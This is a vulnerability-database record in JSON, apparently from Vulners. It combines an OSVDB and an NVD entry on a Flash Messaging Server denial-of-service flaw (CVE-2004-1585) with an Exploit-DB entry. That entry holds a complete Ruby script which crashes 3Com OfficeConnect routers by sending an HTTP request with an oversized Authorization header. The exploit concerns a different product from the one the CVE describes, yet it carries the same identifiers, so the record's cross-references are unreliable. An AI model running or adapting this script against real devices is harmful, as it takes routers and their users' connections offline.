{"type": "osvdb", "published": "2004-10-07T04:36:04", "href": "https://vulners.com/osvdb/OSVDB:10553", "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "127fde8724caf296c27d7174a42bede4"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "f08f2b8960df2aa95d0b4c5fe5f8583d"}, {"key": "href", "hash": "52a58fc91593796ae57a0fcbcb712477"}, {"key": "modified", "hash": "781d26a9a2ab10c179d2b2b25e5ce9d1"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "781d26a9a2ab10c179d2b2b25e5ce9d1"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "0375d2bce7c1d12cafeedfd7c2f4c455"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "viewCount": 0, "history": [], "edition": 1, "objectVersion": "1.2", "reporter": "OSVDB", "title": "Flash Messaging Server Client Communication DoS", "affectedSoftware": [], "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "vulnersScore": 5.0}, "references": [], "id": "OSVDB:10553", "hash": "77901c6888eac5820bf740648e1dfb99b48ee52a7f9e669a9cb10f89d3bd4236", "lastseen": "2017-04-28T13:20:05", "cvelist": ["CVE-2004-1585"], "modified": "2004-10-07T04:36:04", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.flashmessage.com/\nSecurity Tracker: 1011569\n[Secunia Advisory ID:12759](https://secuniaresearch.flexerasoftware.com/advisories/12759/)\nOther Advisory URL: http://aluigi.altervista.org/adv/flashmsg-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0067.html\n[CVE-2004-1585](https://vulners.com/cve/CVE-2004-1585)\n"}

{"cve": [{"lastseen": "2017-07-11T11:14:35", "references": ["http://marc.info/?l=bugtraq&m=109716787607302&w=2", "http://www.securityfocus.com/bid/11351", "https://exchange.xforce.ibmcloud.com/vulnerabilities/17647", "http://securitytracker.com/id?1011569"], "description": "Flash Messaging 5.2.0g (rev 1.1.2) and earlier allows remote attackers to cause a denial of service (application crash) via certain wide characters.", "edition": 3, "reporter": "NVD", "published": "2004-12-31T00:00:00", "title": "CVE-2004-1585", "type": "cve", "enchantments": {"score": {"modified": "2017-07-11T11:14:35", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2004-1585"], "scanner": [], "modified": "2017-07-10T21:31:09", "cpe": ["cpe:/a:jera_technology:flash_messaging:5.2", "cpe:/a:jera_technology:flash_messaging:5.2g"], "id": "CVE-2004-1585", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1585", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T12:43:38", "osvdbidlist": ["10553"], "references": [], "description": "3Com OfficeConnect Routers Remote DoS Exploit. CVE-2004-1585. Dos exploit for hardware platform", "edition": 1, "reporter": "Alberto Ortega Llamas", "published": "2009-12-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "3Com OfficeConnect Routers Remote DoS Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1585"], "modified": "2009-12-19T00:00:00", "id": "EDB-ID:10553", "href": "https://www.exploit-db.com/exploits/10553/", "sourceData": "###############\r\n# Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72\r\n# Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)\r\n# Attacker -> Tested from GNU/Linux (Sidux and Ubuntu)\r\n#\r\n# Exploit languaje -> Ruby\r\n# Type -> Remote Denial of Service Exploit by HTTP\r\n#\r\n# Additional info:\r\n# - I tested it in other similar 3Com router and the system do not crash, but the Internet connection yes.\r\n# - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.\r\n#\r\n###############\r\n# Discovered and written by Alberto Ortega\r\n# http://pentbox.net/\r\n###############\r\n\r\nrequire \"socket\"\r\n\r\nhost = ARGV[0]\r\nbuffer = \"A\"\r\nsend = \"\"\r\n\r\nputs \"\"\r\nif !host\r\n\tputs \" 3Com OfficeConnect ADSL Wireless 11g Firewall Router\"\r\n\tputs \" Remote DoS Exploit by HTTP\"\r\n\tputs \" ------ Usage ---------------------------------------\"\r\n\tputs \" ruby 3com_dosexploit.rb host\"\r\n\tputs \" Ex: ruby 3com_dosexploit.rb 192.168.1.1\"\r\nelse\r\n\tbegin\r\n\t\tsocket = TCPSocket.new(host, 80)\r\n\t\tputs \"- Exploiting ...\"\r\n\t\t# 8.times is enough to DoS\r\n\t\t9.times do\r\n\t\t\tbuffer = \"#{buffer}#{buffer}\"\r\n\t\tend\r\n\t\t# Here are the HTTP packet, Authorization value causes the DoS\r\n\t\tsend = \"GET / HTTP/1.1\\r\\nAuthorization:#{buffer}\\r\\n\"\r\n\t\tsocket.write(send)\r\n\t\tputs \"- Successfully! :)\"\r\n\trescue\r\n\t\tputs \"Connection problem\"\r\n\tend\r\nend\r\nputs \"\"\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10553/"}]}